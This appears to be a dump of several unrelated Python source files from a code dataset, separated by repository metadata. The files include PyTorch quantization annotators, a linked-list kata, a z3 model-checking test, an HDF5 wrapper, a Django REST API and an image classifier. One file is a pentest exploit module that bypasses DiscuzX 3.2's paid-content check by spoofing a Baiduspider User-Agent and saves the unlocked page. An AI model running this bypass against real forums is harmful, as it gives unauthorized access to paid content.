        input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)

        bias = conv_node.args[2]
        if isinstance(bias, Node):
            input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)

        conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),
            _annotated=True
        )

    def _annotate_linear(
        self, gm: torch.fx.GraphModule, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate linear layers found via source-partition matching.

        Unlike the node-by-node annotators above, this scans the whole graph
        module for partitions that originate from ``nn.Linear`` /
        ``F.linear`` calls in the source model.
        """
        module_partitions = get_source_partitions(
            gm.graph, [torch.nn.Linear, torch.nn.functional.linear]
        )
        for module_or_fn_type, partitions in module_partitions.items():
            if module_or_fn_type == torch.nn.Linear:
                for p in partitions:
                    act_node = p.input_nodes[0]
                    output_node = p.output_nodes[0]
                    weight_node = None
                    bias_node = None
                    # Distinguish weight (2-D) from bias (1-D) by rank.
                    for node in p.params:
                        weight_or_bias = getattr(gm, node.target)  # type: ignore[arg-type]
                        if weight_or_bias.ndim == 2:  # type: ignore[attr-defined]
                            weight_node = node
                        if weight_or_bias.ndim == 1:  # type: ignore[attr-defined]
                            bias_node = node
                    if weight_node is None:
                        raise ValueError("No weight found in Linear pattern")
                    # find use of act node within the matched pattern
                    act_use_node = None
                    for node in p.nodes:
                        if node in act_node.users:  # type: ignore[union-attr]
                            act_use_node = node
                            break
                    if act_use_node is None:
                        raise ValueError(
                            "Could not find an user of act node within matched pattern."
                        )
                    if _is_annotated([act_use_node]) is False:  # type: ignore[list-item]
                        _annotate_input_qspec_map(
                            act_use_node,
                            act_node,
                            get_act_obs_or_fq_ctr(quantization_config),
                        )
                    if bias_node and _is_annotated([bias_node]) is False:
                        _annotate_output_qspec(
                            bias_node, get_bias_obs_or_fq_ctr(quantization_config)
                        )
                    if _is_annotated([weight_node]) is False:  # type: ignore[list-item]
                        _annotate_output_qspec(
                            weight_node, get_weight_obs_or_fq_ctr(quantization_config)
                        )
                    if _is_annotated([output_node]) is False:
                        _annotate_output_qspec(
                            output_node, get_act_obs_or_fq_ctr(quantization_config)
                        )
                    nodes_to_mark_annotated = list(p.nodes)
                    _mark_nodes_as_annotated(nodes_to_mark_annotated)

    # TODO: move to `_pt2e/_propagate_annotation.py` after we have
    # decided on the how we want to use pattern matching for annotation
    def _annotate_maxpool2d(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate maxpool (matched via its getitem[0]) with shared
        input/output observers — pooling must not change quant params."""
        if (
            node.op != "call_function"
            or node.target != operator.getitem
            or node.args[1] != 0
        ):
            return
        getitem_node = node
        maxpool_node = getitem_node.args[0]
        assert isinstance(maxpool_node, Node)
        if (
            maxpool_node.op != "call_function"
            or maxpool_node.target != torch.ops.aten.max_pool2d_with_indices.default
        ):
            return
        if _is_annotated([getitem_node, maxpool_node]):
            return

        input_act = maxpool_node.args[0]
        assert isinstance(input_act, Node)
        maxpool_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map={
                input_act: get_act_obs_or_fq_ctr(quantization_config)
            },
            _annotated=True,
        )
        getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),
            _input_output_share_observers=True,
            _annotated=True,
        )

    def _annotate_input_out_obs_sharing_op(
        self,
        op: Callable,
        node: Node,
        quantization_config: QuantizationConfig,
    ) -> None:
        """Generic annotator for ops whose output must share the input's
        observer (hardtanh, mean, adaptive_avg_pool2d, ...)."""
        io_obs_sharing_node = node
        if (
            io_obs_sharing_node.op != "call_function"
            or io_obs_sharing_node.target != op
        ):
            return
        if _is_annotated([io_obs_sharing_node]):
            return

        input_act = io_obs_sharing_node.args[0]
        assert isinstance(input_act, Node)
        io_obs_sharing_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map={
                input_act: get_act_obs_or_fq_ctr(quantization_config)
            },
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),
            _input_output_share_observers=True,
            _annotated=True,
        )

    def _annotate_hardtanh(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate hardtanh as an input/output-observer-sharing op."""
        self._annotate_input_out_obs_sharing_op(
            torch.ops.aten.hardtanh.default, node, quantization_config
        )

    def _annotate_mean(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate both mean overloads as input/output-observer-sharing ops."""
        self._annotate_input_out_obs_sharing_op(
            torch.ops.aten.mean.default, node, quantization_config
        )
        self._annotate_input_out_obs_sharing_op(
            torch.ops.aten.mean.dim, node, quantization_config
        )

    def _annotate_adaptive_avg_pool2d(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate adaptive_avg_pool2d as an input/output-observer-sharing op."""
        self._annotate_input_out_obs_sharing_op(
            torch.ops.aten.adaptive_avg_pool2d.default, node, quantization_config
        )

    def _annotate_add_relu(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate the fused add -> relu pattern (output spec on the relu)."""
        if node.op != "call_function" or node.target not in [
            torch.ops.aten.relu_.default,
            torch.ops.aten.relu.default,
        ]:
            return
        relu_node = node
        add_node = relu_node.args[0]
        assert isinstance(add_node, Node)
        if add_node.op != "call_function" or add_node.target not in [
            torch.ops.aten.add.Tensor,
            torch.ops.aten.add_.Tensor,
        ]:
            return
        if _is_annotated([relu_node, add_node]):
            return

        # Either operand may be a constant rather than a Node.
        input_qspec_map = {}
        input_act0 = add_node.args[0]
        if isinstance(input_act0, Node):
            input_qspec_map[input_act0] = get_act_obs_or_fq_ctr(quantization_config)

        input_act1 = add_node.args[1]
        if isinstance(input_act1, Node):
            input_qspec_map[input_act1] = get_act_obs_or_fq_ctr(quantization_config)

        add_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            _annotated=True,
        )
        relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),
            _annotated=True,
        )

    def _annotate_add(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate a standalone (possibly in-place) tensor add."""
        add_node = node
        if add_node.op != "call_function" or add_node.target not in [
            torch.ops.aten.add.Tensor,
            torch.ops.aten.add_.Tensor,
        ]:
            return
        if _is_annotated([add_node]):
            return

        # Either operand may be a constant rather than a Node.
        input_qspec_map = {}
        input_act0 = add_node.args[0]
        if isinstance(input_act0, Node):
            input_qspec_map[input_act0] = get_act_obs_or_fq_ctr(quantization_config)

        input_act1 = add_node.args[1]
        if isinstance(input_act1, Node):
            input_qspec_map[input_act1] = get_act_obs_or_fq_ctr(quantization_config)

        add_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),
            _annotated=True,
        )

    def validate(self, model: torch.fx.GraphModule) -> None:
        """No post-annotation validation is performed for this quantizer."""
        pass

    @classmethod
    def get_supported_operators(cls) -> List[OperatorConfig]:
        """Return the raw supported (config, operator patterns) table."""
        return cls.supported_config_and_operators
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
class Node(object):
    """Singly linked list node: a value plus a pointer to the next node."""

    def __init__(self, data):
        # A freshly built node starts detached (no successor).
        self.data, self.next = data, None
class Context(object):
    """Holder for the state of the two linked lists (source and dest)."""

    def __init__(self, source, dest):
        self.source, self.dest = source, dest
class Solution():
    """
    https://www.codewars.com/kata/linked-lists-move-node
    Linked Lists - Move Node

    move_node_01 detaches the head node of the ``source`` list and pushes
    it onto the front of the ``dest`` list, returning a Context holding
    both mutated lists. An empty source list raises ValueError.

    Example:
        source = 1 -> 2 -> 3 -> None
        dest   = 4 -> 5 -> 6 -> None
        move_node(source, dest).source == 2 -> 3 -> None
        move_node(source, dest).dest   == 1 -> 4 -> 5 -> 6 -> None
    """

    def __init__(self):
        pass

    def move_node_01(self, source, dest):
        # The source list must contain at least one node to move.
        if not source:
            raise ValueError
        moved = source           # node being transplanted
        remaining = moved.next   # new head of the source list
        moved.next = dest        # splice the node onto the front of dest
        return Context(remaining, moved)
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
5ca7cdea99f9f57fb931b9a94a17fc8138cf99c6 | 422950c243e556871090afe43335c9a3f53e0fbb | /exploit/cms_discuzx_3_2_authority_bypass.py | 08d06e64e926858c9154de642734f0e7d021b3eb | [] | no_license | wooluo/pentestdb | f08bca698c3759e98b7fec2abb88a5244402cca7 | 8390df27c81c86af02ceee88605b758ca34b7878 | refs/heads/master | 2021-01-24T11:44:27.417739 | 2016-03-28T11:22:29 | 2016-03-28T11:22:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,290 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2014-2015 alpha1e0
'''
from script.exploit import Exploit, Result
class DiscuzAB(Exploit):
    """DiscuzX 3.2 paywall bypass: Discuz serves pay-to-view post content in
    full to search-engine crawlers, so spoofing the Baiduspider User-Agent
    reveals it without paying.

    Fixes the original ``_attack``: ``response2.conetnt`` (typo, would raise
    AttributeError) is now ``response2.content``.
    """
    expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
    version = "1.0"
    author = "alpha1e0"
    language = "php"
    appName = "discuz"
    appVersion = "x3.2"
    reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
    description = u'''
    漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
    gh: inurl:forum.php "金币 才能浏览"
    '''

    # Paywall marker ("... to view") and the spoofed crawler User-Agent.
    _SIG = u"才能浏览"
    _USER_AGENT = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

    def _fetch_bypassed(self):
        """Fetch the target with a normal UA and with the spoofed spider UA.

        Return the spider response when the paywall marker is present for
        the normal client but absent for the spider (bypass confirmed),
        otherwise None. Shared by _verify and _attack.
        """
        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers={'User-Agent': self._USER_AGENT})
        if response2.status_code == 200:
            # NOTE(review): the original required the marker in BOTH utf-8 AND
            # gbk encodings; a page normally uses a single encoding, so `or`
            # may have been intended — behavior preserved as written.
            if (self._SIG.encode("utf-8") in response.content
                    and self._SIG.encode("gbk") in response.content
                    and self._SIG.encode("utf-8") not in response2.content
                    and self._SIG.encode("gbk") not in response2.content):
                return response2
        return None

    def _verify(self):
        """Verify mode: report the URL and payload UA when the bypass works."""
        result = Result()
        response2 = self._fetch_bypassed()
        if response2 is not None:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = self._USER_AGENT
        return result

    def _attack(self):
        """Attack mode: dump the bypassed page to result.html."""
        result = Result()
        response2 = self._fetch_bypassed()
        if response2 is not None:
            with open("result.html", "w") as fd:
                # Bug fix: was `response2.conetnt` (AttributeError).
                # NOTE(review): content is bytes; under Python 3 this file
                # should be opened "wb" — kept "w" to match the original
                # Python 2 code.
                fd.write(response2.content)
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = "result.html"
        return result
| [
"yan.shifm@foxmail"
] | yan.shifm@foxmail |
07e5d9d0336c5ab60bb5a0c99ec81e75395d56d4 | b0dcee45a111e08f5cbbb9b1aacf2279b93a65dc | /ic3/ic3onz3/pdr_primary/test.py | f610d0514804495c3169c616d09c4d42bad02517 | [] | no_license | bacmive/paper_notes | 150a38779c13fe329cc6a309476ebac06348bc0e | 09687a23e6eff57c551e68bcb21ac5f198fae73a | refs/heads/master | 2023-02-20T20:06:19.755804 | 2021-01-03T04:25:17 | 2021-01-03T04:25:17 | 298,745,191 | 0 | 0 | null | 2021-01-03T04:25:19 | 2020-09-26T05:36:20 | Python | UTF-8 | Python | false | false | 4,551 | py | #!/usr/bin/python
from z3 import *
from pdr import PDR
def MutualExclusive():
    """Build the z3 model-checking instance for a mutual-exclusion circuit.

    The ``aNN`` locals mirror the AND gates of an AIGER-style netlist
    (``iNN`` = primary inputs, ``lNN`` = latches, ``lNNp`` = primed
    next-state copies of the latches).

    Returns (primary_inputs, variables, primes, init, trans, post) as
    expected by the PDR solver: init constrains the initial latch values,
    trans relates current to primed state, and post is the safety property.
    """
    len_inp = 7  # number of primary inputs (NOTE(review): unused below)
    len_var = 9  # number of latches

    # Primary inputs.
    i2 = Bool('i2')
    i4 = Bool('i4')
    i6 = Bool('i6')
    i8 = Bool('i8')
    i10 = Bool('i10')
    i12 = Bool('i12')
    i14 = Bool('i14')
    primary_inputs = [i2, i4, i6, i8, i10, i12, i14]

    # Latches (current state).
    l16 = Bool('l16')
    l18 = Bool('l18')
    l20 = Bool('l20')
    l22 = Bool('l22')
    l24 = Bool('l24')
    l26 = Bool('l26')
    l28 = Bool('l28')
    l30 = Bool('l30')
    l32 = Bool('l32')

    # Primed (next-state) copies of the latches.
    l16p = Bool(str(l16) + '\'')
    l18p = Bool(str(l18) + '\'')
    l20p = Bool(str(l20) + '\'')
    l22p = Bool(str(l22) + '\'')
    l24p = Bool(str(l24) + '\'')
    l26p = Bool(str(l26) + '\'')
    l28p = Bool(str(l28) + '\'')
    l30p = Bool(str(l30) + '\'')
    l32p = Bool(str(l32) + '\'')
    variables = [l16, l18, l20, l22, l24, l26, l28, l30, l32]
    primes = [l16p, l18p, l20p, l22p, l24p, l26p, l28p, l30p, l32p]

    # AND-gate network (translated gate by gate from the netlist).
    a34 = And(Not(i4), i2)
    a36 = And(a34, Not(i6))
    a38 = And(Not(i10), Not(i8))
    a40 = And(a38, a36)
    a42 = And(Not(i14), Not(i12))
    a44 = And(a42, a40)
    a46 = And(a44, Not(l16))
    a48 = And(Not(l20), l18)
    a50 = And(a48, l22)
    a52 = And(Not(l26), l24)
    a54 = And(a52, l28)
    a56 = And(a54, l30)
    a58 = And(Not(a56), Not(a50))
    a60 = And(l20, l18)
    a62 = And(a60, l22)
    a64 = And(l26, l24)
    a66 = And(a64, l28)
    a68 = And(Not(a66), Not(a62))
    a70 = And(a68, Not(l30))
    a72 = And(Not(a70), a58)
    a74 = And(Not(a72), i2)
    a76 = And(a72, Not(i2))
    a78 = And(Not(a76), Not(a74))
    a80 = And(Not(l20), Not(l18))
    a82 = And(a80, l22)
    a84 = And(a82, Not(i10))
    a86 = And(a48, l30)
    a88 = And(a86, l22)
    a90 = And(i10, Not(i8))
    a92 = And(a90, a88)
    a94 = And(l20, Not(l18))
    a96 = And(a94, l22)
    a98 = And(a96, i10)
    a100 = And(a62, a38)
    a102 = And(l20, i10)
    a104 = And(Not(l20), Not(i10))
    a106 = And(Not(a104), Not(a102))
    a108 = And(Not(a106), i8)
    a110 = And(a108, l18)
    a112 = And(Not(a106), Not(i8))
    a114 = And(a112, Not(l18))
    a116 = And(Not(a114), Not(a110))
    a118 = And(Not(a116), Not(a62))
    a120 = And(Not(a118), Not(a100))
    a122 = And(Not(a120), Not(a96))
    a124 = And(Not(a122), Not(a98))
    a126 = And(Not(a124), Not(a88))
    a128 = And(Not(a126), Not(a92))
    a130 = And(Not(a128), Not(a82))
    a132 = And(Not(a130), Not(a84))
    a134 = And(Not(a132), a78)
    a136 = And(Not(l26), Not(l24))
    a138 = And(a136, l28)
    a140 = And(a138, Not(i14))
    a142 = And(a52, l30)
    a144 = And(a142, l28)
    a146 = And(i14, Not(i12))
    a148 = And(a146, a144)
    a150 = And(l26, Not(l24))
    a152 = And(a150, l28)
    a154 = And(a152, i14)
    a156 = And(a66, a42)
    a158 = And(l26, i14)
    a160 = And(Not(l26), Not(i14))
    a162 = And(Not(a160), Not(a158))
    a164 = And(Not(a162), i12)
    a166 = And(a164, l24)
    a168 = And(Not(a162), Not(i12))
    a170 = And(a168, Not(l24))
    a172 = And(Not(a170), Not(a166))
    a174 = And(Not(a172), Not(a66))
    a176 = And(Not(a174), Not(a156))
    a178 = And(Not(a176), Not(a152))
    a180 = And(Not(a178), Not(a154))
    a182 = And(Not(a180), Not(a144))
    a184 = And(Not(a182), Not(a148))
    a186 = And(Not(a184), Not(a138))
    a188 = And(Not(a186), Not(a140))
    a190 = And(Not(a188), a134)
    a192 = And(a190, a78)
    a194 = And(i6, i4)
    a196 = And(Not(i6), Not(i4))
    a198 = And(Not(a196), Not(a194))
    a200 = And(a198, a192)
    a202 = And(a200, a198)
    a204 = And(a202, Not(a132))
    a206 = And(a204, Not(a188))
    a208 = And(a206, l32)
    a210 = And(a208, l16)
    a212 = And(Not(a210), Not(a46))
    a214 = And(a150, a94)
    a216 = And(a214, l32)

    # All latches start False.
    init = And(*[Not(variables[i]) for i in range(len_var - 1)] + [(Not(variables[-1]))])
    # Next-state functions for each latch.
    trans = And(*[l16p == And(True),
                  l18p == i8,
                  l20p == i10,
                  l22p == i4,
                  l24p == i12,
                  l26p == i14,
                  l28p == i6,
                  l30p == i2,
                  l32p == Not(a212)
                  ])
    # Safety property: the "bad" output a216 is never asserted.
    post = Not(a216)
    # print init
    # print trans
    # print post
    return (primary_inputs, variables, primes, init, trans, post)
# Registry of available tests: name -> builder returning PDR constructor args.
tests = {'MutualExclusive':MutualExclusive,}
def listTests():
for name in tests:
print name
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Run tests examples on the PDR algorithm")
parser.add_argument('-ls', action='store_true')
parser.add_argument('testname', type=str, help='The name of the test to run', default=None, nargs='?')
args = parser.parse_args()
if(args.ls):
listTests()
elif(args.testname!=None):
name = args.testname
print "=========== Running test", name,"==========="
solver = PDR(*tests[name]())
solver.run()
else:
for name in tests:
print "=========== Running test", name,"==========="
solver = PDR(*tests[name]())
solver.run() | [
"bacmive@sohu.com"
] | bacmive@sohu.com |
3665a02e2a26c184c4a4374e80fbd581e6dd5ba5 | 80e19038a65c64532fd986278a78cead0865d0b8 | /amelethdf-python/branches/nathanael/src/amelethdf/node/node_hdf.py | f43e34a6da904176a6365bb22921ea4cf62dac62 | [] | no_license | ThinkManhattan/amelet-hdf | 6470c6d5b5dcc47863d9bceb85df46882f8a1861 | de850be54b5f5782d73f6481279db9db1ab18360 | refs/heads/master | 2020-05-18T01:06:13.821829 | 2015-02-10T12:28:03 | 2015-02-10T12:28:03 | 35,437,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,988 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 15 févr. 2010
@author: nathanael
'''
from tables import openFile
from amelethdf.path import join, isabs, splits, split
from amelethdf.tree_print import TreeLink, TTL_G
__all__ = ['openHDF', 'HDFNode', 'HDFNodeError']
class HDFNodeError(Exception):
    """Raised for invalid HDFNode operations (e.g. requesting a missing child)."""
    pass
def openHDF(path, mode='r', PYTABLES_SYS_ATTRS=False, **kw):
    """Open an HDF5 file with PyTables and wrap its root in an HDFNode."""
    hdf_file = openFile(path, mode, PYTABLES_SYS_ATTRS=PYTABLES_SYS_ATTRS, **kw)
    root_node = HDFNode(hdf_file, '/', '')
    return root_node
class HDFNode(object):
def __init__(self, hdf, where, name):
self.hdf = hdf
self.__where = where
self.__name = name
def __eq__(self, other):
return self.path == other.path
#---------------------------------------------------------------------------
#--- To string methods
#---------------------------------------------------------------------------
def __str__(self):
"""Return the default string view of this node.
"""
return str(self.get_hdfo())
def tostring(self):
"""Return the string tree view of this object.
"""
return self._tostring()
def __repr__(self):
return "<%s object at %s>" % (self.__class__.__name__, self.path)
#---------------------------------------------------------------------------
#--- File meta data an tools
#---------------------------------------------------------------------------
def close(self):
"""Close the file
"""
self.hdf.close()
@property
def isopen(self):
return self.hdf.isopen
@property
def filename(self):
return self.hdf.filename
#---------------------------------------------------------------------------
#--- PyTables access
#---------------------------------------------------------------------------
def get_hdfo(self):
"""Return the hdf object of this node.
"""
if self.__where == '/' and self.name == '':
return self.hdf.root
else:
return self.hdf.getNode(self.path)
hdfo = property(get_hdfo)
#---------------------------------------------------------------------------
#--- HDF Node property
#---------------------------------------------------------------------------
@property
def name(self):
"""Return the name of this data node.
"""
return self.__name
@property
def path(self):
"""Return the path of this node on the HDF File.
"""
return join(self.__where, self.__name)
#---------------------------------------------------------------------------
#--- Tree methods
#---------------------------------------------------------------------------
def get_root(self):
"""Return the root node of this tree.
"""
return self.__class__(self.hdf, '/', '')
def get_node(self, path):
"""Get a children node of this node.
"""
if isabs(path):
node = self.get_root()
else:
node = self
for name in splits(path):
if name != '':
node = node.get_child(name)
return node
#---------------------------------------------------------------------------
#--- Attributes methods
#---------------------------------------------------------------------------
def can_set_attr(self, name, val):
return True
@property
def attrs_name(self):
"""Return attributes list name.
"""
return self.hdfo._v_attrs._v_attrnamesuser
def has_already_attr(self, name):
"""Has already attribute named `name`
"""
return hasattr(self.hdfo._v_attrs, name)
def set_attr(self, name, val):
"""Set the attribute `name` at value `val`
Wrapper of PyTables method
"""
return self.hdfo._f_setAttr(name, val)
def get_attr(self, name):
"""Get the value of the attribute `name`
Wrapper of PyTables method
"""
return self.hdfo._f_getAttr(name)
def del_attr(self, name):
"""Delete the attribute `name`
Wrapper of PyTables method
"""
return self.hdfo._f_delAttr(name)
#---------------------------------------------------------------------------
#--- Children methods
#---------------------------------------------------------------------------
def can_create_child(self, name):
return True
def has_already_child(self, name):
"""has already child the child named `name`
"""
return name in self.hdfo._v_children.keys()
@property
def children_name(self):
"""Return children list name.
"""
return self.hdfo._v_children.keys()
def get_child(self, name, **kw):
"""Set a new child at this node.
"""
if self.has_already_child(name):
return self._build_child(name, **kw)
else:
raise HDFNodeError("Invalid children '%s' for the node '%s'" % (name, str(self)))
#---------------------------------------------------------------------------
#--- Iterator on Children
#---------------------------------------------------------------------------
def __len__(self):
"""Return the numbre of children.
"""
if hasattr(self.hdfo, '_v_children'):
return len(self.hdfo._v_children.keys())
else:
return 0
def __iter__(self):
"""iteration on the children
"""
if hasattr(self.hdfo, '_v_children'):
for child_name in self.hdfo._v_children.keys():
yield self.get_child(child_name)
def walk(self):
"""Visit all tree
"""
yield self
if len(self) > 0:
for child in self:
for sub in child.walk():
yield sub
#---------------------------------------------------------------------------
#--- Internal API
#---------------------------------------------------------------------------
def _hdf_node(self):
return HDFNode(self.hdf, self.__where, self.__name)
def _build_child(self, name):
"""Internal method to build child.
Prefer it at __class__ to build a child.
"""
return self.__class__(self.hdf, self.path, name)
def _tostring(self, tree_link=TreeLink()):
"""Internal API
Build a string tree view of this object
"""
if self == self.get_root():
name = split(self.hdf.filename)[1]
else:
name = self.name
s = str(tree_link) + name + self._tostring_attrs()
tree_link.append(TTL_G)
i = 0
for item in self:
i += 1
tree_link.follow(TTL_G, len(self) == i)
s += '\n' + item._tostring(tree_link)
tree_link.down()
return s
def _tostring_attrs(self):
"""Internal API
Build a string view of this node's attributes
"""
s = ''
i = 0
attrs_name = self.attrs_name
if len(attrs_name) > 0:
s += '('
for attr_name in attrs_name:
s += "%s%s=%s" % ('@', attr_name, str(self.get_attr(attr_name)))
i += 1
if i != len(attrs_name):
s += ', '
s += ')'
return s
    def _create_group(self, name, **kw):
        """Internal API
        Create a new group with the given `name` as son of this.

        Returns the new child node; implicitly returns ``None`` when
        ``can_create_child(name)`` is false.
        """
        if self.can_create_child(name):
            self.hdf.createGroup(self.path, name)
            return self._build_child(name, **kw)
    def _create_table(self, name, description, **kw):
        """Internal API
        Create a new table with the given `name` as son of this.

        `description` is handed directly to the HDF backend's
        ``createTable``.  Returns the new child node; implicitly returns
        ``None`` when ``can_create_child(name)`` is false.
        """
        if self.can_create_child(name):
            self.hdf.createTable(self.path, name, description)
            return self._build_child(name, **kw)
    def _create_dataSet(self, name, dtype, shape=(0,), **kw):
        """Internal API
        Create a new DataSet with the given `name` as son of this.

        The dataset is homogeneous with element type `dtype` and initial
        shape `shape`; it is backed by an EArray, so it can be enlarged
        along one of its dimensions.  Returns the new child node;
        implicitly returns ``None`` when ``can_create_child(name)`` is
        false.
        """
        if self.can_create_child(name):
            self.hdf.createEArray(self.path, name, dtype, shape)
            return self._build_child(name, **kw)
| [
"nathanael.muot@24d24c72-a858-11de-8ba5-91705c1537ed"
] | nathanael.muot@24d24c72-a858-11de-8ba5-91705c1537ed |
8c7e85117d674c5159d064fd0a355713d7d0a090 | 883f57bab7a14102e31a710e226560dc1d251201 | /handlers/deviantart.py | a43da285f78853f9144ce29a0ce256e7cdaa3d54 | [] | no_license | Syfaro/Mirror-Bot | 1d66fa397b75272c89d6626073a3a117eae93ad8 | c97c696a8d38688a93f52051d32ffd1008c6de6a | refs/heads/master | 2016-09-05T17:24:29.046727 | 2014-04-11T03:07:04 | 2014-04-11T03:07:04 | 18,151,878 | 2 | 0 | null | 2014-04-11T03:07:04 | 2014-03-26T19:58:39 | Python | UTF-8 | Python | false | false | 383 | py | import requests
def deviantart(thing, config):
    """
    handler for deviantart.com: resolve a submission URL to its direct
    image link via DeviantArt's oEmbed endpoint.
    """
    oembed_url = "http://backend.deviantart.com/oembed?url={}".format(thing.url)
    data = requests.get(oembed_url).json()
    return {'link': data['url'], 'author': data['author_name'],
            'title': data['title'], 'source': thing.url}
"kleptocis@gmail.com"
] | kleptocis@gmail.com |
01ecbd52726c167dca208300c5454339f0b8a5f8 | a922e0cb9185c24cd038919ff66fe8b1ca04cc45 | /python project/Source/tra_gen.py | e6cd7c85c313d6aca94c3bb46d933d0e4d542a4b | [] | no_license | teja2609/Python- | 2115a7e2060e28f6ee40791ec37495fcd353b319 | 891a0e4e5a3fb54ecdf8afc1f9d21ae3d2a51099 | refs/heads/master | 2021-01-08T19:03:08.046321 | 2019-02-09T00:59:02 | 2019-02-09T00:59:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,073 | py | import cv2
import glob
import numpy as np
import random
#initilaizing fisherface recognizer
fisherface = cv2.face.FisherFaceRecognizer_create()
def getfiles(gender, training_size):
#loading the dataset
file = glob.glob("E:\\cropped_faces\\{0}\\*" .format(gender))
random.shuffle(file)
train = file[:int(len(file) * training_size)]
predict = file[-int(len(file) * (1 - training_size)):]
return train, predict
def make_sets(): #creating lists
train_data = []
train_labels = []
predict_data = []
predict_label = []
for gender in genders:
training_set, prediction_set = getfiles(gender, 0.8) #getting first 805 of files
for object in training_set:
img = cv2.imread(object, 0)#reading the object image
face2 = cv2.resize(img, (350, 350)) #resizing the image
train_data.append(face2)
train_labels.append(genders.index(gender))
for object in prediction_set:
object = cv2.imread(object, 0) #reading the object
face2 = cv2.resize(object, (350, 350)) #resizing the object
predict_data.append(face2)
predict_label.append(genders.index(gender))
return train_data, train_labels, predict_data, predict_label
def run_recognizer():
data_training, labels_training, data_prediction, labels_predictions = make_sets()
print("size of the training set is", len(labels_training), "images")
#training the daraset
fisherface.train(data_training, np.asarray(labels_training))
positive = 0
for id, img in enumerate(data_prediction):
if (fisherface.predict(img)[0] == labels_predictions[id]):
positive += 1
percent = (positive * 100) / len(data_prediction)
return positive, percent
if __name__ == '__main__':
genders = ["female", "male"]
positive, percent = run_recognizer()
print("Processed ", positive, " data correctly")
print("Got ", percent, " accuracy")
#writing the training data
fisherface.write('D:\\models\gender_classifier_model.xml')
| [
"hjddh@mail.umkc.edu"
] | hjddh@mail.umkc.edu |
22ffd2e231fb963244be54d1406be85b8e6a2fad | 08bcc0fd0209a190444a516745d656438e15d096 | /app/profiles_api/views.py | 32572207f0aa3a58f14576e25464ffbe9952654a | [
"MIT"
] | permissive | ckilcioglu/profiles-rest-api | f0ce3ffeeac95f78b992c9ba2f0dfc97eba8f58d | c728959a4a03ff574c0898ae702f399e58705472 | refs/heads/main | 2021-12-04T07:31:35.455208 | 2021-09-15T13:33:20 | 2021-09-15T13:33:20 | 237,062,815 | 0 | 0 | MIT | 2021-06-10T19:43:28 | 2020-01-29T19:18:06 | Python | UTF-8 | Python | false | false | 6,782 | py | from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
    """A basic API view to test functionality"""
    serializer_class = serializers.HelloSerializer
    def get(self, request, format=None):
        """Returns a list of APIView features"""
        an_apiview = [
            'Uses HTTP methods as functions (get, post, patch, put, delete)',
            'Is similar to a traditional Django View',
            'Gives you the most control over your logic',
            'Is mapped manually to URLs',
        ]
        return Response({'message': 'Hello!', 'an_apiview': an_apiview})
    def post(self, request):
        """Create a hello message with our name"""
        serializer = self.serializer_class(data=request.data)
        if serializer.is_valid():
            name = serializer.validated_data.get('name')
            email = serializer.validated_data.get('email')
            message = f'Hello {name} with {email}'
            return Response({'message': message})
        else:
            # Validation failed: echo the serializer errors with HTTP 400.
            return Response(
                serializer.errors,
                status.HTTP_400_BAD_REQUEST
            )
    def put(self, request, pk=None):
        """Handle updating an object"""
        # NOTE(review): this returns key 'method' while patch/delete below
        # use 'message' (and HelloViewSet uses 'http_method') -- likely an
        # unintended inconsistency; left unchanged to preserve API behavior.
        return Response({'method': 'PUT'})
    def patch(self, request, pk=None):
        """Handle partial updating an object"""
        return Response({'message': 'PATCH'})
    def delete(self, request, pk=None):
        """Delete an object"""
        return Response({'message': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
    """Test API ViewSet demonstrating the standard ViewSet actions."""

    serializer_class = serializers.HelloSerializer

    def list(self, request):
        """Return a Hello message."""
        a_viewset = [
            'Users actions (list, create, retrieve, update, partial_update)',
            'Automatically maps to URLs using routers',
            'Provides more functionality with less code',
        ]
